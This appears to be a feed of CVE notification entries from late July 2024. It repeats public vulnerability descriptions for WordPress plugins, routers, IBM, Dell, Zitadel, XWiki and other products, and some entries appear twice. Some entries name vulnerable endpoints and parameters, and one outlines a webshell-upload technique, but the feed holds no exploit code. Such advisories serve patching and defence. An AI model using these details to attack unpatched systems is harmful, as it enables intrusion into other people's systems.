🚨 CVE-2016-10180An issue was discovered on the D-Link DWR-932B router. WPS PIN generation is based on srand(time(0)) seeding.🎖@cveNotify |
|
| 2024-08-01 14:07:38 |
🚨 CVE-2015-8315The ms package before 0.7.1 for Node.js allows attackers to cause a denial of service (CPU consumption) via a long version string, aka a "regular expression denial of service (ReDoS)."🎖@cveNotify |
|
| 2024-08-01 14:07:37 |
🚨 CVE-2012-4792Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.🎖@cveNotify |
|
| 2024-08-01 14:07:36 |
🚨 CVE-2004-2154CUPS before 1.1.21rc1 treats a Location directive in cupsd.conf as case sensitive, which allows attackers to bypass intended ACLs via a printer name containing uppercase or lowercase letters that are different from what is specified in the directive.🎖@cveNotify |
|
| 2024-08-01 13:37:25 |
🚨 CVE-2024-2455The Element Pack - Addon for Elementor Page Builder WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget wrapper link URL in all versions up to, and including, 7.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 13:37:24 |
🚨 CVE-2024-37956Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Vektor,Inc. VK All in One Expansion Unit allows Stored XSS.This issue affects VK All in One Expansion Unit: from n/a through 9.99.1.0.🎖@cveNotify |
|
| 2024-08-01 13:07:42 |
🚨 CVE-2024-41952Zitadel is an open source identity management system. ZITADEL administrators can enable a setting called "Ignoring unknown usernames" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report "Username or Password invalid". Due to a implementation change to prevent deadlocks calling the database, the flag would not be correctly respected in all cases and an attacker would gain information if an account exist within ZITADEL, since the error message shows "object not found" instead of the generic error message. This vulnerability is fixed in 2.58.1, 2.57.1, 2.56.2, 2.55.5, 2.54.8, and 2.53.9.🎖@cveNotify |
|
| 2024-08-01 13:07:41 |
🚨 CVE-2024-39694Duende IdentityServer is an OpenID Connect and OAuth 2.x framework for ASP.NET Core. It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site. Note: by itself, this vulnerability does **not** allow an attacker to obtain user credentials, authorization codes, access tokens, refresh tokens, or identity tokens. An attacker could however exploit this vulnerability as part of a phishing attack designed to steal user credentials. This vulnerability is fixed in 7.0.6, 6.3.10, 6.2.5, 6.1.8, and 6.0.5. Duende.IdentityServer 5.1 and earlier and all versions of IdentityServer4 are no longer supported and will not be receiving updates. If upgrading is not possible, use `IUrlHelper.IsLocalUrl` from ASP.NET Core to validate return Urls in user interface code in the IdentityServer host.🎖@cveNotify |
|
| 2024-08-01 13:07:37 |
🚨 CVE-2024-37901XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit right on any page can perform arbitrary remote code execution by adding instances of `XWiki.SearchSuggestConfig` and `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.🎖@cveNotify |
|
| 2024-08-01 13:07:36 |
🚨 CVE-2024-7340The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.🎖@cveNotify |
|
| 2024-08-01 13:07:32 |
🚨 CVE-2024-3083A “CWE-352: Cross-Site Request Forgery (CSRF)” can be exploited by remote attackers to perform state-changing operations with administrative privileges by luring authenticated victims into visiting a malicious web page.🎖@cveNotify |
|
| 2024-08-01 13:07:31 |
🚨 CVE-2024-31203A “CWE-121: Stack-based Buffer Overflow” in the wd210std.dll dynamic library packaged with the ThermoscanIP installer allows a local attacker to possibly trigger a Denial-of-Service (DoS) condition on the target component.🎖@cveNotify |
|
| 2024-08-01 13:07:30 |
🚨 CVE-2024-31202A “CWE-732: Incorrect Permission Assignment for Critical Resource” in the ThermoscanIP installation folder allows a local attacker to perform a Local Privilege Escalation.🎖@cveNotify |
|
| 2024-08-01 13:07:27 |
🚨 CVE-2024-31201A “CWE-428: Unquoted Search Path or Element” affects the ThermoscanIP_Scrutation service. Such misconfiguration could be abused in scenarios where incorrect permissions were assigned to the C:\ path to attempt a privilege escalation on the local machine.🎖@cveNotify |
|
| 2024-08-01 13:07:26 |
🚨 CVE-2024-31199A “CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')” allows malicious users to permanently inject arbitrary Javascript code.🎖@cveNotify |
|
| 2024-08-01 13:07:25 |
🚨 CVE-2024-39379Acrobat for Edge versions 126.0.2592.81 and earlier are affected by an out-of-bounds read vulnerability that could lead to arbitrary file system read access. An attacker could exploit this vulnerability to read contents from a location in memory past the buffer boundary, potentially leading to sensitive information disclosure. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-01 10:37:24 |
🚨 CVE-2024-6346The Gutenberg Blocks, Page Builder – ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the redirectURL parameter of the Date Countdown widget, in all versions up to, and including, 2.2.85a due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 09:37:25 |
🚨 CVE-2024-6975Cato Networks Windows SDP Client Local Privilege Escalation via openssl configuration file.This issue affects SDP Client before 5.10.34.🎖@cveNotify |
|
| 2024-08-01 09:37:24 |
🚨 CVE-2022-24975The --mirror documentation for Git through 2.35.1 does not mention the availability of deleted content, aka the "GitBleed" issue. This could present a security risk if information-disclosure auditing processes rely on a clone operation without the --mirror option. Note: This has been disputed by multiple 3rd parties who believe this is an intended feature of the git binary and does not pose a security risk.🎖@cveNotify |
|
| 2024-08-01 08:37:37 |
🚨 CVE-2024-38489Dell iDRAC Service Module version 5.3.0.0 and prior contains Out of bound write Vulnerability. A privileged local attacker could execute arbitrary code potentially resulting in a denial of service (partial) event.🎖@cveNotify |
|
| 2024-08-01 08:37:36 |
🚨 CVE-2024-28972Dell InsightIQ, Verion 5.0.0, contains a use of a broken or risky cryptographic algorithm vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to information disclosure.🎖@cveNotify |
|
| 2024-08-01 08:37:31 |
🚨 CVE-2024-41692This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by accessing the root shell on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to execute arbitrary commands with root privileges on the targeted system.🎖@cveNotify |
|
| 2024-08-01 08:37:30 |
🚨 CVE-2024-41689This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to unencrypted storing of WPA/ WPS credentials within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext WPA/ WPS credentials on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to bypass WPA/ WPS and gain access to the Wi-Fi network of the targeted system.🎖@cveNotify |
|
| 2024-08-01 08:37:26 |
🚨 CVE-2024-41687This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to transmission of password in plain text. A remote attacker could exploit this vulnerability by intercepting transmission within an HTTP session on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.🎖@cveNotify |
|
| 2024-08-01 08:37:25 |
🚨 CVE-2024-41685This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router's web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.🎖@cveNotify |
|
| 2024-08-01 08:37:24 |
🚨 CVE-2024-41684This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing secure flag for the session cookies associated with the router's web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to capture cookies and compromise the targeted system.🎖@cveNotify |
|
| 2024-08-01 07:37:26 |
🚨 CVE-2024-7302The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 3gp2 file uploads in all versions up to, and including, 7.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.🎖@cveNotify |
|
| 2024-08-01 07:37:25 |
🚨 CVE-2024-5330The Breakdance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the breakdance_css_file_paths_cache parameter in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-01 07:37:24 |
🚨 CVE-2024-25947Dell iDRAC Service Module version 5.3.0.0 and prior, contain an Out of bound Read Vulnerability. A privileged local attacker could execute arbitrary code potentially resulting in a denial of service event.🎖@cveNotify |
|
| 2024-08-01 06:37:30 |
🚨 CVE-2024-6529The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-08-01 06:37:29 |
🚨 CVE-2024-6496The Light Poll WordPress plugin through 1.0.0 does not have CSRF checks when deleting polls, which could allow attackers to make logged in users perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-08-01 06:37:26 |
🚨 CVE-2024-4090The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any WordPress plugin before 2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-08-01 06:37:25 |
🚨 CVE-2024-2843The WooCommerce Customers Manager WordPress plugin before 30.1 does not have CSRF checks in some places, which could allow attackers to make logged in admin users delete users via CSRF attacks🎖@cveNotify |
|
| 2024-08-01 06:37:24 |
🚨 CVE-2024-1747The WooCommerce Customers Manager WordPress plugin before 30.2 does not have authorisation and CSRF in various AJAX actions, allowing any authenticated users, such as subscriber, to call them and update/delete/create customer metadata, also leading to Stored Cross-Site Scripting due to the lack of escaping of said metadata values.🎖@cveNotify |
|
| 2024-08-01 05:37:25 |
🚨 CVE-2024-7342A vulnerability was found in Baidu UEditor 1.4.3.3. It has been classified as problematic. This affects an unknown part of the file /ueditor/php/controller.php?action=uploadfile&encode=utf-8. The manipulation of the argument upfile leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-01 05:37:24 |
🚨 CVE-2024-2090The Remote Content Shortcode plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5 via the remote_content shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-08-01 04:37:25 |
🚨 CVE-2024-6698The FundEngine plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.0. This is due to the plugin not properly verifying user meta updated through the update_user_meta function. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta which can be leveraged to update their capabilities to gain administrator access.🎖@cveNotify |
|
| 2024-08-01 04:37:24 |
🚨 CVE-2024-1715The AdFoxly – Ad Manager, AdSense Ads & Ads.txt plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the adfoxly_ad_status() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to enable and disable ads.🎖@cveNotify |
|
| 2024-08-01 03:37:26 |
🚨 CVE-2024-7336A vulnerability classified as critical was found in TOTOLINK EX200 4.0.3c.7646_B20201211. Affected by this vulnerability is the function loginauth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-01 03:37:25 |
🚨 CVE-2024-35751Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Creative Motion, Will Bontrager Software, LLC Woody ad snippets allows Stored XSS.This issue affects Woody ad snippets: from n/a through 2.4.10.🎖@cveNotify |
|
| 2024-08-01 03:37:24 |
🚨 CVE-2024-35755Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in El tiempo Weather Widget Pro allows Stored XSS.This issue affects Weather Widget Pro: from n/a through 1.1.40.🎖@cveNotify |
|
| 2024-08-01 02:37:32 |
🚨 CVE-2024-7333A vulnerability was found in TOTOLINK N350RT 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument week/sTime/eTime leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-01 02:37:26 |
🚨 CVE-2024-6687The CTT Expresso para WooCommerce plugin for WordPress is vulnerable to sensitive information exposure in all versions up to and including 3.2.12 via the /wp-content/uploads/cepw directory. The generated .pdf and log files are publicly accessible and contain sensitive information such as sender and receiver names, phone numbers, physical addresses, and email addresses🎖@cveNotify |
|
| 2024-08-01 02:37:25 |
🚨 CVE-2024-34021Unrestricted upload of file with dangerous type vulnerability exists in ELECOM wireless LAN routers. A specially crafted file may be uploaded to the affected product by a logged-in user with an administrative privilege, resulting in an arbitrary OS command execution.🎖@cveNotify |
|
| 2024-08-01 02:37:24 |
🚨 CVE-2024-22372OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product.🎖@cveNotify |
|
| 2024-08-01 01:37:25 |
🚨 CVE-2024-7332A vulnerability was found in TOTOLINK CP450 4.1.0cu.747_B20191224. It has been classified as critical. This affects an unknown part of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-31 23:37:32 |
🚨 CVE-2024-7329A vulnerability, which was classified as critical, was found in YouDianCMS 7. Affected is an unknown function of the file /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php. The manipulation of the argument files leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-31 23:37:26 |
🚨 CVE-2024-7328A vulnerability, which was classified as problematic, has been found in YouDianCMS 7. This issue affects some unknown processing of the file /t.php?action=phpinfo. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-31 23:37:25 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-07-31 23:37:24 |
🚨 CVE-2024-37973Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-31 22:37:24 |
🚨 CVE-2024-41262mmudb v1.9.3 was discovered to use the HTTP protocol in the ShowMetricsRaw and ShowMetricsAsText functions, possibly allowing attackers to intercept communications via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-07-31 21:37:32 |
🚨 CVE-2019-6198A vulnerability was reported in Lenovo PC Manager prior to version 2.8.90.11211 that could allow a local attacker to escalate privileges.🎖@cveNotify |
|
| 2024-07-31 21:37:26 |
🚨 CVE-2019-6197A vulnerability was reported in Lenovo PC Manager prior to version 2.8.90.11211 that could allow a local attacker to escalate privileges.🎖@cveNotify |
|
| 2024-07-31 21:37:25 |
🚨 CVE-2024-29030memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /api/resource that allows authenticated users to enumerate the internal network. Version 0.22.0 of memos removes the vulnerable file.🎖@cveNotify |
|
| 2024-07-31 21:37:24 |
🚨 CVE-2022-4603A vulnerability classified as problematic has been found in ppp. Affected is the function dumpppp of the file pppdump/pppdump.c of the component pppdump. The manipulation of the argument spkt.buf/rpkt.buf leads to improper validation of array index. The real existence of this vulnerability is still doubted at the moment. The name of the patch is a75fb7b198eed50d769c80c36629f38346882cbf. It is recommended to apply a patch to fix this issue. VDB-216198 is the identifier assigned to this vulnerability. NOTE: pppdump is not used in normal process of setting up a PPP connection, is not installed setuid-root, and is not invoked automatically in any scenario.🎖@cveNotify |
|
| 2024-07-31 21:07:25 |
🚨 CVE-2024-0158Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability to modify a UEFI variable, leading to denial of service and escalation of privileges🎖@cveNotify |
|
| 2024-07-31 21:07:24 |
🚨 CVE-2024-35137IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. IBM X-Force ID: 292413.🎖@cveNotify |
|
| 2024-07-31 20:37:32 |
🚨 CVE-2024-6974Cato Networks Windows SDP Client Local Privilege Escalation via self-upgradeThis issue affects SDP Client: before 5.10.34.🎖@cveNotify |
|
| 2024-07-31 20:37:26 |
🚨 CVE-2024-6973Remote Code Execution in Cato Windows SDP client via crafted URLs.This issue affects Windows SDP Client before 5.10.34.🎖@cveNotify |
|
| 2024-07-31 20:37:25 |
🚨 CVE-2023-25697Cross-Site Request Forgery (CSRF) vulnerability in GamiPress.This issue affects GamiPress: from n/a through 2.5.6.🎖@cveNotify |
|
| 2024-07-31 20:37:24 |
🚨 CVE-2022-45832Missing Authorization vulnerability in Hennessey Digital Attorney.This issue affects Attorney: from n/a through 3.🎖@cveNotify |
|
| 2024-07-31 20:07:29 |
🚨 CVE-2024-34444Missing Authorization vulnerability in ThemePunch OHG Slider Revolution.This issue affects Slider Revolution: from n/a before 6.7.0.🎖@cveNotify |
|
| 2024-07-31 20:07:26 |
🚨 CVE-2023-39312Missing Authorization vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.1.🎖@cveNotify |
|
| 2024-07-31 20:07:25 |
🚨 CVE-2023-36516Missing Authorization vulnerability in ThimPress LearnPress.This issue affects LearnPress: from n/a through 4.2.3.🎖@cveNotify |
|
| 2024-07-31 20:07:24 |
🚨 CVE-2023-36515Missing Authorization vulnerability in ThimPress LearnPress.This issue affects LearnPress: from n/a through 4.2.3.🎖@cveNotify |
|
| 2024-07-31 19:37:32 |
🚨 CVE-2024-41630Stack-based buffer overflow vulnerability in Tenda AC18 V15.03.3.10_EN allows a remote attacker to execute arbitrary code via the ssid parameter at ip/goform/fast_setting_wifi_set.🎖@cveNotify |
|
| 2024-07-31 19:37:31 |
🚨 CVE-2024-40645FOG is a cloning/imaging/rescue suite/inventory management system. An improperly restricted file upload feature allows authenticated users to execute arbitrary code on the fogproject server. The Rebranding feature has a check on the client banner image requiring it to be 650 pixels wide and 120 pixels high. Apart from that, there are no checks on things like file extensions. This can be abused by appending a PHP webshell to the end of the image and changing the extension to anything the PHP web server will parse. This vulnerability is fixed in 1.5.10.41.🎖@cveNotify |
|
| 2024-07-31 19:37:30 |
🚨 CVE-2023-28149An issue was discovered in the IhisiServiceSmm module in Insyde InsydeH2O with kernel 5.2 before 05.28.42, 5.3 before 05.37.42, 5.4 before 05.45.39, 5.5 before 05.53.39, and 5.6 before 05.60.39 that could allow an attacker to modify UEFI variables.🎖@cveNotify |
|
| 2024-07-31 19:37:27 |
🚨 CVE-2023-50953IBM InfoSphere Information Server 11.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned. This information could be used in further attacks against the system. IBM X-Force ID: 275775.🎖@cveNotify |
|
| 2024-07-31 19:37:26 |
🚨 CVE-2023-50952IBM InfoSphere Information Server 11.7 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 275774.🎖@cveNotify |
|
| 2024-07-31 19:37:25 |
🚨 CVE-2024-31902IBM InfoSphere Information Server 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 289234.🎖@cveNotify |
|
| 2024-07-31 19:37:24 |
🚨 CVE-2024-28798IBM InfoSphere Information Server 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 287172.🎖@cveNotify |
|
| 2024-07-31 19:07:25 |
🚨 CVE-2024-31898IBM InfoSphere Information Server 11.7 could allow an authenticated user to read or modify sensitive information by bypassing authentication using insecure direct object references. IBM X-Force ID: 288182.🎖@cveNotify |
|
| 2024-07-31 19:07:24 |
🚨 CVE-2024-28797IBM InfoSphere Information Server 11.7 is vulnerable stored to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 287136.🎖@cveNotify |
|
| 2024-07-31 18:37:25 |
🚨 CVE-2024-37391ProtonVPN before 3.2.10 on Windows mishandles the drive installer path, which should use this: '"' + ExpandConstant('{autopf}\Proton\Drive') + '"' in Setup/setup.iss.🎖@cveNotify |
|
| 2024-07-31 18:37:24 |
🚨 CVE-2023-4863Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-07-31 17:37:30 |
🚨 CVE-2024-6977A vulnerability in Cato Networks SDP Client on Windows allows the insertion of sensitive information into the log file, which can lead to an account takeover. However, the attack requires bypassing protections on modifying the tunnel token on a the attacker's system.This issue affects SDP Client: before 5.10.34.🎖@cveNotify |
|
| 2024-07-31 17:37:26 |
🚨 CVE-2024-6974Untrusted Search Path, Incorrect Default Permissions vulnerability in Cato Networks SDP Client on Windows allows Privilege Escalation.This issue affects SDP Client: before 5.10.34.🎖@cveNotify |
|
| 2024-07-31 17:37:25 |
🚨 CVE-2024-41953Zitadel is an open source identity management system. ZITADEL uses HTML for emails and renders certain information such as usernames dynamically. That information can be entered by users or administrators. Due to a missing output sanitization, these emails could include malicious code. This may potentially lead to a threat where an attacker, without privileges, could send out altered notifications that are part of the registration processes. An attacker could create a malicious link, where the injected code would be rendered as part of the email. On the user's detail page, the username was also not sanitized and would also render HTML, giving an attacker the same vulnerability. While it was possible to inject HTML including javascript, the execution of such scripts would be prevented by most email clients and the Content Security Policy in Console UI. This vulnerability is fixed in 2.58.1, 2.57.1, 2.56.2, 2.55.5, 2.54.8 2.53.9, and 2.52.3.🎖@cveNotify |
|
| 2024-07-31 17:37:24 |
🚨 CVE-2024-41952Zitadel is an open source identity management system. ZITADEL administrators can enable a setting called "Ignoring unknown usernames" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report "Username or Password invalid". Due to a implementation change to prevent deadlocks calling the database, the flag would not be correctly respected in all cases and an attacker would gain information if an account exist within ZITADEL, since the error message shows "object not found" instead of the generic error message. This vulnerability is fixed in 2.58.1, 2.57.1, 2.56.2, 2.55.5, 2.54.8, and 2.53.9.🎖@cveNotify |
|
| 2024-07-31 17:07:24 |
🚨 CVE-2024-28794IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 286831.🎖@cveNotify |
|
| 2024-07-31 16:37:30 |
🚨 CVE-2024-39694Duende IdentityServer is an OpenID Connect and OAuth 2.x framework for ASP.NET Core. It is possible for an attacker to craft malicious Urls that certain functions in IdentityServer will incorrectly treat as local and trusted. If such a Url is returned as a redirect, some browsers will follow it to a third-party, untrusted site. Note: by itself, this vulnerability does **not** allow an attacker to obtain user credentials, authorization codes, access tokens, refresh tokens, or identity tokens. An attacker could however exploit this vulnerability as part of a phishing attack designed to steal user credentials. This vulnerability is fixed in 7.0.6, 6.3.10, 6.2.5, 6.1.8, and 6.0.5. Duende.IdentityServer 5.1 and earlier and all versions of IdentityServer4 are no longer supported and will not be receiving updates. If upgrading is not possible, use `IUrlHelper.IsLocalUrl` from ASP.NET Core to validate return Urls in user interface code in the IdentityServer host.🎖@cveNotify |
|
| 2024-07-31 16:37:26 |
🚨 CVE-2024-39318The Ibexa Admin UI Bundle contains all the necessary parts to run the Ibexa DXP Back Office interface. The file upload widget is vulnerable to XSS payloads in filenames. Access permission to upload files is required. As such, in most cases only authenticated editors and administrators will have the required permission. It is not persistent, i.e. the payload is only executed during the upload. In effect, an attacker will have to trick an editor/administrator into uploading a strangely named file.🎖@cveNotify |
|
| 2024-07-31 16:37:25 |
🚨 CVE-2024-37898XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When a user has view but not edit right on a page in XWiki, that user can delete the page and replace it by a page with new content without having delete right. The previous version of the page is moved into the recycle bin and can be restored from there by an admin. As the user is recorded as deleter, the user would in theory also be able to view the deleted content, but this is not directly possible as rights of the previous version are transferred to the new page and thus the user still doesn't have view right on the page. It therefore doesn't seem to be possible to exploit this to gain any rights. This has been patched in XWiki 14.10.21, 15.5.5 and 15.10.6 by cancelling save operations by users when a new document shall be saved despite the document's existing already.🎖@cveNotify |
|
| 2024-07-31 16:37:24 |
🚨 CVE-2024-7299** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Bolt CMS 3.7.1. It has been rated as problematic. This issue affects some unknown processing of the file /preview/page of the component Entry Preview Handler. The manipulation of the argument body leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273167. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-07-31 16:07:24 |
🚨 CVE-2024-39493In the Linux kernel, the following vulnerability has been resolved:crypto: qat - Fix ADF_DEV_RESET_SYNC memory leakUsing completion_done to determine whether the caller has goneaway only works after a complete call. Furthermore it's stillpossible that the caller has not yet called wait_for_completion,resulting in another potential UAF.Fix this by making the caller use cancel_work_sync and then freeingthe memory safely.🎖@cveNotify |
|
| 2024-07-31 15:37:25 |
🚨 CVE-2024-7340The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.🎖@cveNotify |
|
| 2024-07-31 15:37:24 |
🚨 CVE-2024-7205When the device is shared, the homepage module are before 2.19.0 in eWeLink Cloud Service allows Secondary user to take over devices as primary user via sharing unnecessary device-sensitive information.🎖@cveNotify |
|
| 2024-07-31 15:07:25 |
🚨 CVE-2024-36450Cross-site scripting vulnerability exists in sysinfo.cgi of Webmin versions prior to 1.910. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the website using the product. As a result, a session ID may be obtained, a webpage may be altered, or a server may be halted.🎖@cveNotify |
|
| 2024-07-31 15:07:24 |
🚨 CVE-2024-37085VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.🎖@cveNotify |
|
| 2024-07-31 14:37:37 |
🚨 CVE-2024-3083A “CWE-352: Cross-Site Request Forgery (CSRF)” can be exploited by remote attackers to perform state-changing operations with administrative privileges by luring authenticated victims into visiting a malicious web page.🎖@cveNotify |
|
| 2024-07-31 14:37:36 |
🚨 CVE-2024-37135DM5500 5.16.0.0, contains an information disclosure vulnerability. A local attacker with high privileges could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.🎖@cveNotify |
|
| 2024-07-31 14:37:32 |
🚨 CVE-2024-31202A “CWE-732: Incorrect Permission Assignment for Critical Resource” in the ThermoscanIP installation folder allows a local attacker to perform a Local Privilege Escalation.🎖@cveNotify |
|
| 2024-07-31 14:37:31 |
🚨 CVE-2024-31200A “CWE-201: Insertion of Sensitive Information Into Sent Data” affecting the administrative account allows an attacker with physical access to the machine to retrieve the password in cleartext when an administrative session is open in the browser.🎖@cveNotify |
|
| 2024-07-31 14:37:30 |
🚨 CVE-2024-31199A “CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')” allows malicious users to permanently inject arbitrary Javascript code.🎖@cveNotify |
|
| 2024-07-31 14:37:26 |
🚨 CVE-2023-33859IBM Security QRadar EDR 3.12 could disclose sensitive information due to an observable login response discrepancy. IBM X-Force ID: 257697.🎖@cveNotify |
|
| 2024-07-31 14:37:25 |
